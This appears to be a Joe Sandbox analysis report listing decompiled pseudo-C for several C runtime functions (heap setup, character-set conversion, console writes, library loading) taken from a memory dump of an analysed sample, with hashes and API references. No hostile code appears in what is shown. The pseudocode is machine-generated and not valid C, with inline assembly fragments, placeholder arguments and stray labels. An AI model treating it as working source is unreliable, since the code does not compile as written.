Source File: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004067fe
0x00406806
0x0040680e

APIs

GetProcessHeap.KERNEL32 ref: 004067FE

Memory Dump Source

Source File: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x8dbf8a31
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x8dbf8a31
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x8dbf8a31
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x8dbf8a31
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8dbf8a32
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
